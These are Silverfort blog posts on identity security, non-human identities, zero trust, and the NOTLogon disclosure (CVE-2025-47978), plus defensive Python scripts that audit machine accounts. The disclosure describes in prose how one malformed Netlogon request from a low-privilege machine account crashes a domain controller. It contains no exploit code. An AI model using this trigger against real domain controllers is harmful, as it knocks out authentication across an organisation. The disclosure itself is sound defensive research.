- Does your solution stop attackers with step-up authentication, access blocking, or forced re-authentication? And can it do so without halting user productivity?
- If a breach occurs, can your solution contain the attack and ensure it doesn’t spread to additional resources?
Figure: Identity Threat Detection and Response from Silverfort (cloud-specific)

### Capability #6: Improve identity security posture, proactively discover risks, and remediate weaknesses across hybrid environments

Weak points in the identity infrastructure – such as misconfigurations, outdated protocols, and excessive privileges – often go unnoticed until it’s too late, leading to account takeovers, lateral movement, and failed audits. Mapping and remediating risks at scale requires centralized visibility, comprehensive protection, and measurable results to improve and maintain identity hygiene. To get to the root of whether a solution provider offers comprehensive identity security posture management (ISPM), key questions to ask include:

- Can your solution provide a prioritized inventory of identity weaknesses within the organization?
- Can your solution identify exposures associated with user activity and authentication requests, such as legacy protocols?
- How do you identify service accounts that are dormant or no longer in use?
- Can your platform detect users who are not in Domain Admins or other obvious groups, but still have admin-level permissions (shadow admins)?

Figure: Identity Security Posture Management from Silverfort (on-prem specific)

### Download the Identity Security RFP Checklist

These questions are a small sample of what’s available in the full checklist – download it today to see the entire list for each of the six capabilities. The best part is that we also made the checklist interactive for you to customize it based on your team’s needs; once you download, you’ll have the option to get the list of questions in either a Google Sheet or Microsoft Excel format (whatever you prefer!). It’s time to make identity security your strategic advantage.
Based on our identity security experts’ curated list of questions to ask vendors, you’ll leave conversations with vendors with a clear picture of how you can connect the dots, make informed decisions, and stay ahead of threats. Interested in seeing how Silverfort satisfies the capabilities within the Identity Security RFP Checklist? Browse our platform now.

---

- Published: 2025-07-14
- Modified: 2025-07-14
- URL: https://www.silverfort.com/blog/whats-the-difference-between-nhi-and-ai-agents-and-why-it-matters/

As AI capabilities evolve, the concepts of non-human identity (NHI) and AI agent are showing up increasingly in our daily work, especially in engineering, product, and system design contexts. You will see them in architecture diagrams, GitHub discussions, dev standups, or even baked into feature specs. An LLM-powered service might be labeled an “agent,” while a persistent user-facing system gets assigned an “identity.” The problem? These terms are being used interchangeably when they describe fundamentally different things.

AI agents are AI/LLM-driven software systems. They can be powerful and autonomous. While they are tools, they are often not treated as identities, but they should be. They require security, oversight, and accountability, but not the projection of intent. NHIs, on the other hand, are machine or workload identities assigned to systems that persist, adapt, and present themselves in ways that resemble their identity. Treating them as agents risks ignoring their growing complexity and presence.

In this blog, we will clarify what these terms really mean, how they differ, and why the distinction matters, especially for teams building and integrating intelligent systems.

### What is an AI agent?

AI agents are systems powered by large language models (LLMs) that make decisions, manage tasks, and adapt dynamically to real-time inputs. These systems go beyond passive tools; they can adapt autonomously and in real time.
AI agents don’t just respond; they take action. Unlike traditional systems that wait for user input, AI agents can initiate workflows, orchestrate across APIs, update databases, manage schedules, and even control physical devices. They are increasingly embedded into everything from developer tools and customer support systems to smart home platforms and product backends. For example, an AI agent might automatically escalate a support ticket based on sentiment analysis, trigger a deployment pipeline after code review, or adjust IoT device settings based on real-time sensor data.

Most AI agents typically share these three core traits:

- Autonomy – they can operate without continuous human input
- Goal-directed behavior – they pursue defined objectives or tasks
- Environmental awareness – they process inputs and adjust behavior based on changing context

These agents are powerful and can appear intelligent, but they are still software systems that are designed artifacts. They do not have identity, intent, or continuity of self. They may behave in ways that feel human-like, especially when interacting through natural language, but they remain fundamentally task-driven programs built to serve specific functions. Understanding this distinction is critical.

### What is a non-human identity (NHI)?

Non-human identities (NHIs) are machine or workload identities used by software and systems to access resources. They are assigned to entities like APIs, service accounts, containers, workloads, and IoT devices. The purpose of NHIs is to allow automated systems and services to securely interact with other components in a distributed environment without human intervention. They enable tasks like data transfer, API calls, code deployment, workload orchestration, and service-to-service communication. NHIs are foundational to daily work operations, enabling infrastructure to scale, adapt, and function autonomously across dynamic, multi-cloud environments.
For example, an NHI might allow a CI/CD pipeline to push code to production, a Kubernetes pod to pull secrets from a vault, or an IoT sensor to report health metrics to a cloud dashboard.

At a high level, NHIs typically share three core characteristics:

- Automation-first – they are designed to operate without manual intervention
- System-integrated – they are tightly embedded into apps, infrastructure, and platforms
- High-volume and short-lived – they are often created and destroyed programmatically at high speed and scale

Despite their importance, NHIs are often overlooked in traditional identity systems, which were built for managing human users. They usually lack proper visibility, governance, or controls, making them a growing security risk. NHIs do not have intent or awareness; they are not intelligent. But they do hold privileges and access that, if compromised, can lead to major security risks. As NHIs continue to evolve, it is essential to understand their role and secure them effectively to maintain security and operational resilience.

### Key differences between non-human identities and AI agents

AI agents are not NHIs, and they should not be treated as such. Grouping AI agents under the umbrella of NHIs is not only inaccurate; it can also create security risks.

NHIs like service accounts and tokens are predictable by design. They are static tools built to execute specific, predefined functions. Their behavior doesn’t change, and they never act without instruction. Because of this predictability, they can be modeled, monitored, and managed within traditional identity frameworks.

AI agents are fundamentally different. They are autonomous. They interpret intent, reason independently, and make decisions that evolve in real time. Their actions are not scripted. Unlike NHIs, AI agents can surprise you, and that’s not a side-effect—it’s a feature.

Treating AI agents as just another type of machine identity ignores this profound shift.
It risks applying the wrong controls, overlooking new risk vectors, and ultimately undermining trust in systems designed to be intelligent. We need to stop forcing these entities into outdated identity approaches.

AI agents are a new identity type. They demand a new approach for lifecycle governance, behavioral monitoring, and real-time intervention. Recognizing this isn’t just a matter of knowledge, it’s a matter of security.

Here is a breakdown of the key differences:

| | NHIs | AI Agents |
|---|---|---|
| What they are | Digital credentials for systems or services | Task-driven intelligent systems powered by AI |
| Primary purpose | Enable machines or workloads to authenticate and access resources | Make decisions, act on data, and perform workflows |
| Security focus | Credential management, access controls, lifecycle | Behavior monitoring, permissions, and context limits |
| Identity lifecycle | Configured like a user account: created, rotated, expired | Not a standalone identity; built on top of NHIs |
| Risks | Exposed API keys, unused service accounts | Autonomous overreach, overprivileged, prompt injection, and misuse |
| Governance needs | Least privilege, credential hygiene, and rotation | Guardrails, explainability, and intent restriction |
| Identity security alignment | Enforce authentication, authorization, and visibility | Enforce action scope, verification, and observability |

### Why knowing the difference matters

Understanding the difference between NHIs and AI agents is critical for securing your environment and users. If you treat both the same, you risk securing one layer while leaving the other wide open. You might lock down credentials but fail to monitor what the agent is doing with them. Or you might constrain AI behavior, but overlook that it is using a long-lived, over-permissioned NHI.

These are two distinct threat surfaces, and if you do not address them as distinct entities in your identity security strategy, you are leaving critical vulnerabilities and security risks unchecked.
Now is the time to clearly understand the differences between NHIs and AI agents, because only with that visibility can you apply the right controls, close the right gaps, and stay ahead of the risks that are already here.

---

- Published: 2025-07-11
- Modified: 2025-07-11
- URL: https://www.silverfort.com/blog/non-human-identities-and-zero-trust-the-next-evolution-in-identity-security/

As enterprises push forward with digital transformation, a new and often overlooked attack surface has emerged: non-human identities (NHIs). NHIs are types of machine identities used by applications, workloads, containers, APIs, IoT devices, and more, and they far outnumber human users and are essential to how modern systems run.

NHIs drive automation and scalability but also introduce new layers of complexity and risks. Traditional identity tools, designed for human users, can’t keep up with the speed and scale of NHIs across hybrid and multi-cloud environments.

Securing these identities requires a strategic shift. Zero Trust offers that shift where identity becomes the new perimeter, and NHIs are governed, verified, and protected just like any human user.

### The rise of non-human identities

According to IDC, 95% of all enterprise system-to-system communications are now conducted by NHIs. The proliferation of NHIs is not a coincidence; it's driven by three major technological shifts.

Figure: Source: IDC

First, enterprises are embracing cloud-native architectures, containerized workloads, and infrastructure as code (IaC). In these environments, NHIs are foundational. Every microservice, serverless function (like AWS Lambda or Azure Functions), or containerized workload needs its own identity to request resources or perform operations. For example, a single Kubernetes cluster might dynamically spin up thousands of pods, each with its own machine identity and scoped access to APIs or databases.
These modern architectures dissolve traditional perimeters, making identity the new security boundary. Security must now follow the workload, whether it lives in a public cloud, on-premises, or in a transient container.

Second, organizations are racing to automate repetitive tasks through CI/CD pipelines, robotic process automation (RPA), and AI-driven workflows. These systems depend on NHIs to function. DevOps pipelines use service accounts to fetch code, deploy applications, and run integration tests. Chatbots and AI agents retrieve data via API calls, relying on access tokens and machine credentials. RPA bots log in to ERP systems to process invoices or update records, often with broad access. Each of these interactions is authenticated by a non-human identity and represents a potential attack surface.

Third, the Internet of Things (IoT) revolution has added billions of new endpoints, each one requiring authentication, encryption, and role-based access. Industrial IoT sensors in manufacturing facilities send telemetry to cloud services. Connected medical devices communicate patient data in real time. Smart city infrastructure coordinates lighting, traffic signals, and energy grids. Each device has a machine identity — often poorly secured, rarely rotated, and frequently outliving its original project or use case.

### A taxonomy of trust: Types of NHIs

NHIs come in various forms, depending on their use case and environment. Service accounts are widely used by applications and scripts to access databases, cloud resources, or internal systems, and they often have excessive privileges. Machine certificates (such as TLS/SSL certificates) provide encrypted communications and authenticate servers and clients; however, expired or misconfigured certificates can cause catastrophic outages. Cloud-native roles (like AWS IAM roles, Azure Managed Identities, or Google Cloud service accounts) enable workloads to access resources securely.
Meanwhile, API keys and tokens allow services to interact in SaaS or third-party integrations.

While these identity credentials are easy to create and deploy, they are hard to monitor and secure. The key challenge is not just managing a few machine identities, but doing so at scale — dynamically and securely across diverse platforms.

### Non-human identity security and risks: The silent epidemic

Non-human identities (NHIs) such as service accounts, API keys, and machine-to-machine credentials are vital to modern IT operations, but they often fall outside the scope of traditional IAM and even Zero Trust frameworks. These identities are frequently created programmatically, used briefly, and then forgotten, leaving them unmanaged and vulnerable.

NIST SP 800-207 emphasizes the need to eliminate long-lived credentials in favor of short-lived, automatically expiring ones. This reduces the risk of credential theft by narrowing the attack window and ensures NHIs follow the same rigorous access controls as human users.

Unfortunately, credential hygiene remains a critical weakness—and attackers are exploiting it:

- In the 2022 Twitter breach, hardcoded API keys were exposed in a public repo.
- An expired SSL certificate triggered a major Microsoft Exchange outage in 2021.
- In the SolarWinds attack, over-privileged machine accounts enabled lateral movement and data theft.

The stakes are high. Many reported cloud breaches involve compromised NHIs—often due to exposed API tokens or unmanaged service accounts. As NHIs continue to proliferate, securing and managing them is no longer optional—it’s mission-critical.

Adding to the challenge is fragmentation. IAM tools like Active Directory were designed for humans, not machines. Different environments (e.g., Kubernetes, CI/CD pipelines, IoT) manage NHIs in isolation, creating silos, inconsistent enforcement, and audit fatigue.
To address these risks, organizations must start treating NHIs as first-class identities with full lifecycle management, strong access controls, and visibility across environments, all aligned to Zero Trust principles.

### Why Zero Trust is essential for non-human identity security

The Zero Trust model, which asserts “never trust, always verify,” is well-suited to the dynamic nature of non-human identities. Unlike old perimeter-based security models, Zero Trust assumes breach by default and validates every access request—whether from a human user or a machine. Most Zero Trust implementations today, however, focus on human-centric measures: multi-factor authentication, single sign-on identity providers like Okta or Azure AD, and endpoint security agents on user devices.

Figure: Zero Trust applies to non-human identities (NHIs)

Non-human identities often bypass these human-focused controls. A service account, for example, might have persistent access to critical systems with no MFA or behavioural analytics monitoring its use. An API key embedded in code can grant access indefinitely without triggering any alerts. These blind spots are exactly what attackers seek to exploit, allowing them to operate undetected using stolen or misused machine credentials.

### Roadmap: Operationalizing Zero Trust for non-human identities

Securing NHIs under a Zero Trust framework requires a clear operational roadmap. Organizations should approach this systematically, covering everything from visibility to enforcement:

First, gain complete visibility into the machine identity landscape. You can’t protect what you don’t know exists, so inventory all NHIs across cloud and on-premises environments and map out where and how they interact.

Next, establish ownership and governance for machine identities. Every NHI should have a designated owner or team responsible for it.
Define lifecycle policies for these identities — for example, automatically deactivate or rotate credentials after a period of inactivity — and enforce those policies consistently.

Modernize authentication for non-humans. Passwords and other static credentials should be phased out in favor of stronger mechanisms. Employ certificate-based or token-based authentication for services and APIs. Embracing standards like SPIFFE (Secure Production Identity Framework For Everyone) can help ensure consistent workload identity management across platforms.

Figure: Stages of Zero Trust implementation

Integrate monitoring into security operations. Feed machine identity logs and access events into your Security Information and Event Management (SIEM) and User and Entity Behavior Analytics (UEBA) tools. Baseline normal behavior for service accounts and certificates and enable anomaly detection to flag unusual usage patterns in real time.

Finally, automate the machine identity lifecycle. The issuance, rotation, and revocation of credentials should be built into CI/CD pipelines and automated workflows. By integrating identity management into development pipelines, organizations eliminate manual errors and ensure that security keeps up with the speed of deployment.

### Embedding Zero Trust into machine identity management

Protecting NHIs requires embedding Zero Trust principles throughout the machine identity lifecycle. This begins with recognizing machine identities as first-class entities in your IAM program, just like human users. Secure them with strong, cryptographic authentication methods — such as mutual TLS certificates for services, established workload identity standards, or time-limited API tokens — rather than shared passwords or static keys. Zero Trust architecture also means combining certificate-based machine identities with context-aware access decisions.
In practice, that could involve checking the context of a request (origin, time, workload type) before granting access, not just the credential. Decentralized identity issuance frameworks, which dynamically issue and validate certificates or tokens for workloads, can help establish trust across distributed and cloud environments on the fly.

To reduce risk, static credentials must be phased out in favor of short-lived, tightly scoped ones. Secrets management systems should issue ephemeral credentials that expire quickly, and secure identity federation can provide temporary access tokens for external or hybrid services when needed. Additionally, enforcing Zero Standing Privileges (ZSP) ensures that NHIs receive access only when necessary and only to the resources required for their task. In other words, machine identities shouldn’t have more privileges than needed, nor should they be left enabled when not in use.

Micro-segmentation is another critical Zero Trust control for NHIs. By enforcing granular network boundaries around workloads and services, it contains potential compromises and prevents attackers from moving laterally to other systems if a single machine identity is breached.

Figure: The NHI lifecycle

Meanwhile, continuous monitoring and behavioural analytics are essential for detecting anomalous NHI activity. Unusual access patterns — for instance, a normally dormant service account suddenly attempting to read large amounts of sensitive data — should trigger automatic responses. Those responses might include revoking the suspicious credentials, isolating the workload, or other real-time countermeasures based on risk signals. Modern Zero Trust solutions support this kind of adaptive, risk-based policy enforcement to ensure that even when machine identities behave unexpectedly, the system can respond immediately to mitigate harm.
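As an added example (not code from the post or from Silverfort), the ownership, rotation and monitoring steps of the roadmap above, expressed as checks over a constructed NHI inventory and access log: lifecycle findings for missing owners and overdue credentials, plus a detector for the case just described, a long-dormant service account that suddenly reads a large volume of data, which attaches the revoke-and-isolate responses the post names. The inventory records, events, thresholds and dates are all assumed sample values.

```python
from datetime import date, datetime, timedelta

# Constructed NHI inventory (sample data, not from a real environment).
INVENTORY = [
    {"id": "svc-billing", "kind": "service_account", "owner": "finance-platform",
     "issued": "2025-05-01"},
    {"id": "ci-deployer", "kind": "api_key", "owner": None,
     "issued": "2024-09-12"},
    {"id": "svc-legacy-etl", "kind": "service_account", "owner": "data-eng",
     "issued": "2023-11-30"},
]

# Constructed access-log events: (identity, ISO timestamp, resource, bytes read).
EVENTS = [
    ("svc-billing", "2025-07-08T02:00:00", "db/invoices", 2_000_000),
    ("svc-billing", "2025-07-09T02:00:00", "db/invoices", 2_100_000),
    ("svc-billing", "2025-07-10T02:00:00", "db/invoices", 1_900_000),
    ("ci-deployer", "2025-07-09T11:30:00", "registry/app", 50_000_000),
    ("ci-deployer", "2025-07-10T11:30:00", "registry/app", 50_000_000),
    # Silent for months, then a very large read of customer data.
    ("svc-legacy-etl", "2025-03-01T03:00:00", "db/customers", 500_000),
    ("svc-legacy-etl", "2025-07-10T04:12:00", "db/customers", 900_000_000),
]

# Assumed evaluation time for the sample data.
TODAY = date(2025, 7, 10)
NOW = datetime(2025, 7, 10, 12, 0, 0)


def hygiene_findings(inventory, today, max_cred_age_days=90):
    """Lifecycle policy checks: every NHI needs an owner and a recently rotated credential."""
    findings = []
    for nhi in inventory:
        if not nhi["owner"]:
            findings.append((nhi["id"], "no_owner"))
        age = (today - date.fromisoformat(nhi["issued"])).days
        if age > max_cred_age_days:
            findings.append((nhi["id"], "credential_overdue_for_rotation"))
    return findings


def last_seen_before(events, identity, cutoff):
    """Most recent event for identity strictly before cutoff, or None if never seen."""
    stamps = [datetime.fromisoformat(t) for i, t, _, _ in events
              if i == identity and datetime.fromisoformat(t) < cutoff]
    return max(stamps) if stamps else None


def detect_dormant_reactivation(events, inventory, now, dormant_days=60,
                                bytes_threshold=100_000_000):
    """Flag NHIs that were silent for at least dormant_days and then read more than
    bytes_threshold within the last 24 hours. Each alert carries the automatic
    responses the post describes: revoke the credential, isolate the workload."""
    window_start = now - timedelta(days=1)
    alerts = []
    for nhi in inventory:
        recent = [e for e in events if e[0] == nhi["id"]
                  and datetime.fromisoformat(e[1]) >= window_start]
        if not recent:
            continue
        prior = last_seen_before(events, nhi["id"], window_start)
        # An identity with no history at all is treated as dormant.
        quiet_days = (window_start - prior).days if prior else dormant_days
        total = sum(e[3] for e in recent)
        if quiet_days >= dormant_days and total > bytes_threshold:
            alerts.append({"identity": nhi["id"], "quiet_days": quiet_days,
                           "bytes_read": total,
                           "response": ["revoke_credential", "isolate_workload"]})
    return alerts


if __name__ == "__main__":
    for finding in hygiene_findings(INVENTORY, TODAY):
        print("hygiene:", finding)
    for alert in detect_dormant_reactivation(EVENTS, INVENTORY, NOW):
        print("alert:", alert)
```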
### Business case: Why non-human identity security matters now

Securing non-human identities (NHIs) is no longer just an IT concern; it’s a business-critical priority. With machine identities now vastly outnumbering human users, any gap in managing them can open the door to breaches, data loss, and operational disruption.

### How NHI security can strengthen your organization

By moving away from long-lived credentials and enforcing continuous verification, companies can sharply reduce attack surfaces and limit the damage of potential intrusions.

But the benefits go far beyond security:

- Compliance becomes simpler, with stronger identity governance and reduced audit overhead.
- Uptime improves by automating routine tasks like certificate renewal, avoiding costly outages caused by expired credentials.
- Innovation accelerates, as unified identity governance eliminates friction across teams, systems, and environments.

In short, getting NHI security right protects the business from risk, boosts operational resilience, and enables faster, safer innovation.

### The future of identity security: Unified, continuous, contextual

As experts suggest machine identities now outnumber human identities anywhere from 50:1 to 100:1 — and continue to grow exponentially — they are no longer a mere footnote in cybersecurity; they have become the front line. The future of identity security lies in unified platforms that can continuously authenticate and govern every interaction, whether it’s a person logging in or a microservice calling an API. Identity is no longer static; it’s dynamic, contextual, and foundational to security. We are witnessing a paradigm shift. The age of NHIs is here, and with it comes both unprecedented opportunity and new risks. Organizations that elevate machine identities to strategic assets and adopt Zero Trust as their guiding principle won’t just be more secure — they’ll be more agile, more compliant, and better prepared for whatever comes next.
---

- Published: 2025-07-08
- Modified: 2025-07-08
- URL: https://www.silverfort.com/blog/notlogon-how-a-low-privilege-machine-can-dos-your-domain/

Silverfort discovers Active Directory Denial-of-Service (DoS) vulnerability, known as NOTLogon (CVE-2025-47978)

### Executive summary

The Silverfort security research team identified a denial-of-service (DoS) vulnerability in Microsoft's Netlogon protocol, a core component all Windows domain controllers use. The issue, which we refer to as NOTLogon and Microsoft has named the Windows Kerberos Denial of Service vulnerability, allows any domain-joined machine with minimal privileges to send a specially-crafted authentication request that will crash a domain controller and cause a full reboot. This vulnerability does not require elevated privileges—only standard network access and a weak machine account are needed. In typical enterprise environments, any low-privileged user can create such accounts by default. The crash impacts LSASS, the core security process in Windows, and leads to widespread disruption in Active Directory services, including user logins, policy application, and authentication-dependent resources. Microsoft has given it a CVE rating of 6.5 and issued a fix for CVE-2025-47978 as part of the July 8th, 2025 Patch Tuesday. We strongly recommend immediate deployment of this update across all domain controllers, along with tightening access controls for service and machine accounts.

### Vulnerability discovery through AI

One of the first and most difficult questions a security researcher must consider is where they are most likely to find a vulnerability. Researchers sift through vast amounts of data, code, and documentation, then choose the right places to look deeper. To speed up the process, and test the boundaries of AI, we used LLMs to identify potential flaws by comparing old release notes to new. This approach recently led to the discovery of this zero-day Active Directory Denial of Service vulnerability.
### How the DoS vulnerability works

The Netlogon Remote Protocol (MS-NRPC) is a fundamental part of Windows domain-based networking, used to authenticate users and machines and maintain secure channels between domain members and Domain Controllers (DCs). Given its privileged position and constant network presence, even non-privilege escalation vulnerabilities in Netlogon can be catastrophic.

When we think of authentication vulnerabilities, we often imagine attackers escalating privileges, stealing credentials, or executing remote code. But some of the most disruptive threats can be purely destructive—cutting off access, halting services, and disrupting domain-wide operations. In this post, we uncover NOTLogon, a Denial-of-Service (DoS) vulnerability in the Netlogon protocol that can destabilize or disable core Active Directory operations by exploiting flaws in session negotiation and state handling.

### NETLOGON 101

To appreciate the implications of NOTLogon, we must understand the Netlogon protocol, a fundamental part of Microsoft’s domain-based security architecture. The Netlogon Remote Protocol (MS-NRPC) is a privileged authentication and channel-establishment protocol used by domain-joined computers and Domain Controllers (DCs). Introduced in Windows NT and still actively used today, Netlogon enables remote domain functionalities such as machine account authentication, acting as an authentication broker, facilitating password rotation, and supporting numerous other sensitive operations critical to Active Directory infrastructure.

One of the most critical yet often overlooked roles of the Netlogon protocol is its function as an authentication broker within Windows domain environments. While commonly associated with secure channel establishment for machine accounts, Netlogon also acts as an intermediary between the Local Security Authority Subsystem Service (LSASS) and domain controllers for processing user authentication requests.
When a user logs in over the network to a remote application, LSASS delegates the authentication to Netlogon if the credentials must be validated against Active Directory. Netlogon then encapsulates the request into a protocol-specific message called NetrLogonSamLogon and forwards it to the appropriate domain controller, handling the negotiation and response transparently. This is known as passthrough authentication.

Figure: Passthrough authentication example

### What kind of authentication scenarios does Netlogon support?

Netlogon supports a wide range of authentication scenarios through its NETLOGON_LEVEL union, officially known as NETLOGON_LOGON_INFO_CLASS, which defines how user and service credentials are packaged and forwarded. According to the MS-NRPC specification, the supported levels include:

- NetlogonInteractiveInformation: For interactive logons, where users enter credentials at the workstation (e.g., via Ctrl+Alt+Del). This level enables challenge/response verification (typically NTLM or Kerberos) sent to the DC.
- NetlogonNetworkInformation: For network logons, such as accessing SMB or RPC resources after an interactive logon. Credentials (like NTLM tokens) are transparently re-sent without prompting the user.
- NetlogonServiceInformation: For service account logons, used when Windows services authenticate with domain credentials to access resources.
- Transitive levels (Interactive, Network, Service): Variants of the above enabling cross-domain or trust-bound authentication, where credentials propagate across domains with trust relationships—e.g., NetlogonInteractiveTransitiveInformation, NetlogonNetworkTransitiveInformation, and NetlogonServiceTransitiveInformation.
- NetlogonGenericInformation: For generic pass-through authentication, including NTLM, Digest, and Kerberos PAC validation, where a server accepts user credentials and relays them to a DC for validation.

### How is Netlogon evolving?
With NTLM officially deprecated, Microsoft unveiled the Network Ticket Logon specification on July 29th, 2024, and finalized it in an MS-NRPC update released November 19th, 2024. This enhancement allows services to present pre-issued Kerberos tickets to a domain controller using the NetrLogonSamLogonEx RPC—eliminating the need for the original client to directly contact the DC. This scenario supports future capabilities like LocalKDC, where ticket validation can occur offline or through intermediaries. Since it introduces new logic for ticket parsing, PAC verification, and delegated trust handling within a privileged RPC path, we began analyzing the Network Ticket Logon mechanism to assess its security boundaries and potential for misuse.

Our journey into the new Network Ticket Logon scenario began with its delivery mechanism: the NetrLogonSamLogonEx RPC call. Microsoft originally introduced this call to generalize logon flows, but as of July 2024, it now supports an entirely new authentication path by accepting the NETLOGON_TICKET_LOGON_INFO structure. This is the heart of the Network Ticket Logon scenario—enabling services to submit Kerberos tickets to a domain controller for validation, without requiring the original client to directly interact with the DC.

We turned our attention to the specification for NETLOGON_TICKET_LOGON_INFO, and immediately encountered complexity and ambiguity. Two fields in particular drew our focus: ServiceTicket and AdditionalTicket, both declared as PUCHAR buffers (a pointer type used in Windows API programming to represent a raw byte array—essentially an address pointing to an unsigned char buffer of arbitrary length). The role of ServiceTicket was clearly defined as “a pointer to an unsigned character array containing the service ticket.” Simple enough.

Figure: NETLOGON_TICKET_LOGON_INFO structure from MS-NRPC RFC

But AdditionalTicket was far more ambiguous.
The spec notes: “If the service ticket is a User2User ticket, then the ticket-granting ticket (TGT) used as the source of the session key must also be provided.” That raised more questions than it answered. Is this field optional unless the ticket represents a U2U scenario? Is the expected content always a TGT? Could other ticket types be valid? To complicate matters, the accompanying AdditionalTicketLength field is described as “the length of the Kerberos service ticket that is the source of authorization”—a conflicting statement if the buffer is meant to contain a TGT.

With limited clarity from the documentation, we shifted to experimentation. We constructed the structure manually and began sending controlled requests to a fully patched domain controller. When dealing with privileged RPCs like Netlogon, implementation often speaks louder than spec.

The minimal requirement to perform a NetrLogonSamLogonEx is a machine account registered in the domain, which represents a computer or server. Notably, by default, each user may create up to 10 machine accounts in an Active Directory domain. This means a weak user is enough to bind to the Netlogon interface and perform a Network Ticket Logon to a domain controller.

### The crash: Where Network Ticket Logon breaks

Once we had a working NETLOGON_TICKET_LOGON_INFO structure, we sent a standard Network Ticket Logon request to the domain controller using NetrLogonSamLogonEx. The request included a valid service ticket, as expected. While the Netlogon call returned STATUS_SUCCESS, the embedded KerberosError field inside the response contained STATUS_INSUFFICIENT_RESOURCES—an unusual and suspicious result for a seemingly valid request.

To investigate further, we began fuzzing the structure. Omitting the ServiceTicket entirely returned the expected STATUS_INVALID_PARAMETER. However, when we targeted the AdditionalTicket field and sent it as an empty buffer, we observed a crash on the domain controller.
(Figure: the LSASS crash results in a full system failure and triggers a domain controller reboot.) The crash dump pointed to a function named KdcUnpackAdditionalTgt, responsible for decoding the AdditionalTicket buffer into a Kerberos KERB_TICKET ASN.1 structure. Critically, the function failed to validate that the input buffer was non-empty and well-formed before attempting the decode. This led to a NULL pointer dereference inside LSASS, the Windows process that governs authentication and security policy enforcement. Because LSASS is a critical system process, its termination brings the whole system down and forces a reboot of the domain controller. To understand the minimal requirements for exploitation, we tested whether a valid service ticket was necessary. It wasn't: the vulnerable code path is reached before the ServiceTicket is evaluated. More importantly, no elevated privileges are required; network access to the DC and any domain machine account are sufficient to trigger the crash. This forms the core of NOTLogon: a denial-of-service vulnerability introduced by the new Network Ticket Logon scenario. Due to a missing validation in a newly added buffer handler, a single malformed RPC call can destabilize domain controllers, posing a serious reliability and availability threat in enterprise environments.

Creating chaos: Implications and mitigation

The implications of NOTLogon are straightforward and severe. With only a valid machine account and a crafted RPC message, an attacker can remotely crash a domain controller, the system responsible for the core functions of Active Directory: authentication, authorization, Group Policy enforcement and service ticket issuance. Crashing all domain controllers effectively paralyzes the domain, cutting off access to resources, interrupting user logins and disrupting every component that depends on centralized identity.
In environments with poorly managed credentials or insufficient segmentation between workstations and domain controllers, NOTLogon becomes a low-cost, high-impact vector for operational disruption. We strongly suggest installing the Microsoft Patch Tuesday update released on July 8th, 2025, which includes a fix for CVE-2025-47978. Organizations should patch all domain controllers without delay, as the issue resides in the Netlogon service itself.

How to create a more secure identity security posture in Active Directory

Patching is the first step, but in parallel teams should audit and harden machine accounts (including the default quota that lets any user create them), restrict network access to domain controllers, and limit and monitor service account access, especially for accounts capable of initiating Netlogon RPC flows. With Active Directory (AD) as the backbone of most organizations' networks, maintaining its security hygiene is essential to reduce the chance of attackers using it to gain unauthorized access to sensitive data. Silverfort can help you clean up Active Directory and reduce your tech debt in several ways, including: uncovering hidden admin accounts (aka shadow admins) and misconfigurations that silently expand your attack surface; identifying and eliminating risky practices, such as NTLMv1 usage and stale service accounts, that go undetected in native tools; and defending against stealthy identity-based attacks, like Kerberoasting and Print Spooler exploits, before they escalate. NOTLogon is a reminder that new protocol features, especially in privileged authentication services, can become attack surfaces overnight. Staying secure isn't only about applying patches; it's about examining the foundational systems we rely on every day.
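The advice above to audit machine accounts and monitor who can initiate Netlogon flows can be turned into a concrete detection. What follows is an added example, not code from the Silverfort research or from Microsoft: it scans Windows Security events for ID 4741 (“A computer account was created”), flags creations performed by any account outside an approved provisioning list, and warns when a single creator is approaching the default machine account quota of 10. The CORP domain, the account names and the key=value event layout are constructed for the example; event 4741 and the ms-DS-MachineAccountQuota attribute are real. Setting ms-DS-MachineAccountQuota to 0 removes the self-service precondition entirely; the script is for the period before that change lands and for catching accounts created earlier.

```python
import re
from collections import Counter

# Assumption for this example: the only accounts expected to create computer
# objects are a join/provisioning service account and the built-in Administrator.
APPROVED_CREATORS = {"CORP\\svc-sccm-join", "CORP\\Administrator"}
# Default value of the ms-DS-MachineAccountQuota attribute in an AD domain.
DEFAULT_MACHINE_ACCOUNT_QUOTA = 10

# Constructed sample of Windows Security events, flattened to key=value pairs
# the way a SIEM export might present them. 4741 = "A computer account was
# created"; the 4720 (user account created) record is there to show filtering.
SAMPLE_EVENTS = [
    "EventID=4741 SubjectUserName=svc-sccm-join SubjectDomainName=CORP TargetUserName=WS-FIN-017$",
    "EventID=4741 SubjectUserName=Administrator SubjectDomainName=CORP TargetUserName=DC03$",
    "EventID=4720 SubjectUserName=Administrator SubjectDomainName=CORP TargetUserName=bob",
] + [
    f"EventID=4741 SubjectUserName=jdoe SubjectDomainName=CORP TargetUserName=ROGUE-{i:02d}$"
    for i in range(1, 10)
]

_KV = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one key=value record into a dict of strings."""
    return dict(_KV.findall(line))


def creator_of(event):
    """DOMAIN\\user of the account that performed the operation."""
    return f"{event['SubjectDomainName']}\\{event['SubjectUserName']}"


def find_unapproved_joins(lines):
    """(creator, new computer account) for every 4741 raised by a non-approved account."""
    hits = []
    for event in map(parse_event, lines):
        if event.get("EventID") != "4741":
            continue
        creator = creator_of(event)
        if creator not in APPROVED_CREATORS:
            hits.append((creator, event["TargetUserName"]))
    return hits


def creators_near_quota(lines, warn_at=DEFAULT_MACHINE_ACCOUNT_QUOTA - 2):
    """Creators whose 4741 count is at or above warn_at.

    A low-privileged user who has quietly created several machine accounts is
    exactly the precondition NOTLogon needs, so the count itself is a signal.
    """
    counts = Counter(
        creator_of(event)
        for event in map(parse_event, lines)
        if event.get("EventID") == "4741"
    )
    return {creator: n for creator, n in counts.items() if n >= warn_at}


if __name__ == "__main__":
    for creator, machine in find_unapproved_joins(SAMPLE_EVENTS):
        print(f"ALERT computer account {machine} created by unapproved {creator}")
    for creator, n in creators_near_quota(SAMPLE_EVENTS).items():
        print(f"WARN {creator} created {n} machine accounts (quota {DEFAULT_MACHINE_ACCOUNT_QUOTA})")
```

Run it as a script to see the alerts for the sample, or pass a SIEM export with the same fields to find_unapproved_joins. One ordinary user behind nine computer accounts is the kind of signal to triage before a domain controller starts rebooting.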
